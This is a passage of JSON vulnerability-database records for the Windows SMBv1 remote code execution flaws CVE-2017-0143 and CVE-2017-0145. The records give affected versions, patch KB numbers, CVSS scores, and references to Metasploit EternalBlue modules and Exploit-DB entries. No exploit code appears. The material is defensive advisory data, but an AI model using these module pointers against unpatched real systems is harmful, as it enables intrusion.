"Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 
2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {"baseScore": "8.1", "temporalScore": "7.3", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C"}}, 
"lastseen": "2021-10-04T22:46:36", "differentElements": ["msAffectedSoftware"], "edition": 87}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "0af4fa0c2d2e9ecbee64838f6a9ee483", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], 
"cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-10-06T08:45:17", "history": [], "viewCount": 10, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "thn", "idList": ["THN:BC214880895281474C1A8EF7B7D98C13", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "threatpost", "idList": ["THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:43C3E019D454987EF522E299C31E9D3F"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", "EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:146236"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", 
"MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10977", "KLA10979"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02", "ICSMA-20-170-01"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-10-04T22:46:36", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-10-04T22:46:36", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012216", "KB4013198", "KB4012214", "KB3213986", "KB4012212", "KB3210721", "KB4012606", "KB4013429", "KB3210720", "KB3205409", "KB3212646", "KB3205401", "KB4012215", "KB4012598", "KB4012213", "KB4012217", "KB3177186", "KBMS16-110, 3187754"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": 
"KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 
2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit 
Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": 
"KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 
1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {"baseScore": "8.1", "temporalScore": "7.3", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C"}}, "lastseen": "2021-10-06T08:45:17", "differentElements": ["msAffectedSoftware"], "edition": 88}], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0177"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "thn", "idList": ["THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", 
"THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:43C3E019D454987EF522E299C31E9D3F"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "zdt", "idList": ["1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", 
"KLA10979"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}], "modified": "2021-10-06T10:49:13", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-10-06T10:49:13", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012606", "KB3212646", "KB4012215", "KB3205409", "KB4012216", "KB4012213", "KB3177186", "KB3213986", "KB4012217", "KB3205401", "KB4012212", "KB4012598", "KBMS16-110, 3187754", "KB4012214", "KB3210720", "KB3210721", "KB4013429", "KB4013198"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 
3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", 
"kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {"baseScore": "8.1", "temporalScore": "7.3", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C"}, "_object_type": "robots.models.mscve.MsCveBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.mscve.MsCveBulletin"]}, {"id": "MS:CVE-2017-0145", "hash": "91abc99a545f1702db030dbb906d98de", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way 
that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, 